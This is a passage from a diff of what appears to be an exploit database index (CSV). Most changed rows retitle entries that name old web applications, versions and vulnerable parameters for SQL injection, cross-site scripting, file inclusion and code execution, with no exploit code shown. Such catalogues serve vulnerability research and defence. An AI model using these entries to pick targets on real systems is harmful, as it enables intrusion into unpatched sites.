Auriemma",multiple,webapps,0 -31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 -31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 - ajax_request.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 -31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 - slim.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 -31238,platforms/php/webapps/31238.txt,"Jinzora 2.7.5 - popup.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 +31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps,0 +31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 - 'ajax_request.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps,0 +31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 - 'slim.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps,0 +31238,platforms/php/webapps/31238.txt,"Jinzora 2.7.5 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps,0 31239,platforms/php/webapps/31239.txt,"Google Hack Honeypot File Upload Manager 1.3 - 'delall' Unauthorized File Access",2008-02-19,Mr-m07,php,webapps,0 31240,platforms/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 - 'Subject' HTML Injection",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps,0 -31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 31243,platforms/php/webapps/31243.txt,"Joomla! / Mambo Component com_team - SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31244,platforms/php/webapps/31244.txt,"Joomla! / Mambo Component com_iigcatalog - 'cat' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31245,platforms/php/webapps/31245.txt,"Joomla! / Mambo Component com_formtool - 'catid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31246,platforms/php/webapps/31246.txt,"Joomla! / Mambo Component com_genealogy - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31247,platforms/php/webapps/31247.txt,"Joomla! Component iJoomla! com_magazine - 'pageid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 -31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31244,platforms/php/webapps/31244.txt,"Joomla! / Mambo Component com_iigcatalog - 'cat' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31245,platforms/php/webapps/31245.txt,"Joomla! / Mambo Component com_formtool - 'catid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31246,platforms/php/webapps/31246.txt,"Joomla! / Mambo Component com_genealogy - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31247,platforms/php/webapps/31247.txt,"Joomla! Component iJoomla! com_magazine - 'pageid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 -31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 -31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 -31528,platforms/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 +31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 +31528,platforms/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 -31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 -31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 -31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 -31278,platforms/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - GradebookStuScores.asp GrdBk Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 -31280,platforms/php/webapps/31280.txt,"Joomla! / Mambo Component Referenzen - 'id' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31281,platforms/php/webapps/31281.txt,"PHP-Nuke Classifieds Module - 'Details' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 +31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'Comments.asp?FC' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 +31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'Labels.asp?Term' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 +31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'ClassList.asp?Term' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 +31278,platforms/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - 'GradebookStuScores.asp?GrdBk' SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 +31280,platforms/php/webapps/31280.txt,"Joomla! / Mambo Component Referenzen - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps,0 +31281,platforms/php/webapps/31281.txt,"PHP-Nuke Classifieds Module - 'Details' SQL Injection",2008-02-21,S@BUN,php,webapps,0 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 +31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' SQL Injection",2008-02-21,S@BUN,php,webapps,0 +31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' SQL Injection",2008-02-21,S@BUN,php,webapps,0 31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0 -31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 -31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 -31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0 +31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' SQL Injection",2008-02-23,S@BUN,php,webapps,0 +31288,platforms/php/webapps/31288.txt,"Joomla! / Mambo Component com_hello_world - 'id' SQL Injection",2008-02-23,S@BUN,php,webapps,0 +31289,platforms/php/webapps/31289.txt,"PHP-Nuke Gallery 1.3 Module - 'artid' SQL Injection",2008-02-23,S@BUN,php,webapps,0 31290,platforms/php/webapps/31290.txt,"AuraCMS 2.2 - 'lihatberita' Module SQL Injection",2008-02-23,S@BUN,php,webapps,0 -31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 -31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 -31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0 -31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' Parameter SQL Injection",2008-02-25,-=Mizo=-,php,webapps,0 -31295,platforms/php/webapps/31295.txt,"Joomla! / Mambo Component com_wines 1.0 - 'id' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0 -31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' Parameter SQL Injection",2008-02-25,S@BUN,php,webapps,0 -31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 +31291,platforms/php/webapps/31291.txt,"Joomla! / Mambo Component com_publication - 'pid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 +31292,platforms/php/webapps/31292.txt,"Joomla! / Mambo Component com_blog - 'pid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 +31293,platforms/php/webapps/31293.txt,"Gary's Cookbook 3.0 - 'id' SQL Injection",2008-02-25,S@BUN,php,webapps,0 +31294,platforms/php/webapps/31294.txt,"Softbiz Jokes and Funny Pictures Script - 'sbcat_id' SQL Injection",2008-02-25,-=Mizo=-,php,webapps,0 +31295,platforms/php/webapps/31295.txt,"Joomla! / Mambo Component com_wines 1.0 - 'id' SQL Injection",2008-02-25,S@BUN,php,webapps,0 +31296,platforms/php/webapps/31296.txt,"Galore Simple Shop 3.1 - 'section' SQL Injection",2008-02-25,S@BUN,php,webapps,0 +31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps,0 -31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0 +31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component com_inter - 'id' SQL Injection",2008-02-25,The-0utl4w,php,webapps,0 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0 31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure",2008-02-28,"Richard Brain",cgi,webapps,0 -31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'Username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 -31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Parameter Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0 +31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'Username' Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 +31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0 31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0 31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 -31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 -31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 -31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 +31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - 'minimal/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 +31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - 'simplest/wiki.php?page' Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0 -31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection",2008-03-03,Dominus,php,webapps,0 +31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' HTML Injection",2008-03-03,Dominus,php,webapps,0 31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution",2014-02-01,@u0x,multiple,webapps,0 31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection",2007-06-25,Lupton,php,webapps,0 -31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection",2008-03-05,ZoRLu,php,webapps,0 +31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' SQL Injection",2008-03-05,ZoRLu,php,webapps,0 31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Inclusion",2008-03-06,THE_MILLER,php,webapps,0 -31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection",2008-03-06,r080cy90r,php,webapps,0 -31529,platforms/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 +31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' SQL Injection",2008-03-06,r080cy90r,php,webapps,0 +31529,platforms/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,php,webapps,0 31350,platforms/php/webapps/31350.txt,"CiMe Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80 -31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' Parameter SQL Injection",2008-03-06,meloulisi,php,webapps,0 -31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 - popup.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - dir2.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 - upload.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 - dirxml.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 -31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - wp-admin/users.php inviteemail Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 -31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - wp-admin/invites.php to Parameter Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 -31358,platforms/php/webapps/31358.txt,"Specimen Image Database - taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 +31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' SQL Injection",2008-03-06,meloulisi,php,webapps,0 +31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 - 'popup.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 +31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - 'dir2.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 +31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 - 'upload.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 +31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 - 'dirxml.php?path' Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 +31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - 'wp-admin/users.php?inviteemail' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - 'wp-admin/invites.php?to' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 +31358,platforms/php/webapps/31358.txt,"Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath Parameter Cross-Site Scripting",2008-03-08,nnposter,php,webapps,0 31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 31367,platforms/php/webapps/31367.txt,"Batchelor Media BM Classifieds - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0 -31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 - 'pid' Parameter SQL Injection",2008-03-10,meloulisi,php,webapps,0 -31369,platforms/php/webapps/31369.txt,"Gallarific - search.php query Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 +31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 - 'pid' SQL Injection",2008-03-10,meloulisi,php,webapps,0 +31369,platforms/php/webapps/31369.txt,"Gallarific - 'search.php?query' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 31370,platforms/php/webapps/31370.txt,"Gallarific - Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,php,webapps,0 -31371,platforms/php/webapps/31371.txt,"EasyImageCatalogue 1.31 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 -31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - thumber.php dir Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 -31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - describe.php d Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 -31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - addcomment.php d Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 -31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Inclusion",2008-03-10,THE_MILLER,php,webapps,0 -31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' Parameter SQL Injection",2008-03-10,Lovebug,php,webapps,0 +31371,platforms/php/webapps/31371.txt,"EasyImageCatalogue 1.31 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 +31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - 'thumber.php?dir' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 +31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - 'describe.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 +31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - 'addcomment.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 +31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Local File Inclusion",2008-03-10,THE_MILLER,php,webapps,0 +31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' SQL Injection",2008-03-10,Lovebug,php,webapps,0 31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 - 'watermark.php' File Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 - 'catalog_watermark.php' file Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 -31382,platforms/php/webapps/31382.txt,"Joomla! / Mambo Component ensenanzas - 'id' Parameter SQL Injection",2008-03-11,The-0utl4w,php,webapps,0 -31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' Parameter SQL Injection",2008-03-11,Houssamix,php,webapps,0 -31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' Parameter SQL Injection",2008-03-11,Lovebug,php,webapps,0 -31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusion",2008-03-12,muuratsalo,php,webapps,0 -31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusion",2008-03-12,muuratsalo,php,webapps,0 -31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 +31382,platforms/php/webapps/31382.txt,"Joomla! / Mambo Component ensenanzas - 'id' SQL Injection",2008-03-11,The-0utl4w,php,webapps,0 +31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' SQL Injection",2008-03-11,Houssamix,php,webapps,0 +31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' SQL Injection",2008-03-11,Lovebug,php,webapps,0 +31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,php,webapps,0 +31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,php,webapps,0 +31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - browse Action category Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - search_results Action search Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 -31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 - For Xoops 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0 +31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 - For Xoops 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps,0 31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 31401,platforms/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File Inclusion",2008-03-12,U238,php,webapps,0 -31402,platforms/php/webapps/31402.txt,"eWeather - 'chart' Parameter Cross-Site Scripting",2008-03-12,NetJackal,php,webapps,0 +31402,platforms/php/webapps/31402.txt,"eWeather - 'chart' Cross-Site Scripting",2008-03-12,NetJackal,php,webapps,0 31404,platforms/asp/webapps/31404.txt,"Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection",2008-03-13,The-0utl4w,asp,webapps,0 31406,platforms/php/webapps/31406.txt,"SNewsCMS 2.x - 'search.php' Cross-Site Scripting",2008-03-17,medprostuda.ru,php,webapps,0 31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting",2008-03-17,ZoRLu,php,webapps,0 -31410,platforms/php/webapps/31410.txt,"Joomla! / Mambo Component com_guide - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0 +31410,platforms/php/webapps/31410.txt,"Joomla! / Mambo Component com_guide - 'category' SQL Injection",2008-03-17,The-0utl4w,php,webapps,0 31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0 31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0 31414,platforms/php/webapps/31414.txt,"phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps,0 @@ -32499,15 +32500,15 @@ id,file,description,date,author,platform,type,port 31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 31435,platforms/php/webapps/31435.py,"Joomla! Component com_community 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80 31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 -31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 +31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps,0 31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection / Remote File Inclusion",2008-03-19,Cod3rZ,php,webapps,0 31442,platforms/asp/webapps/31442.txt,"Iatek 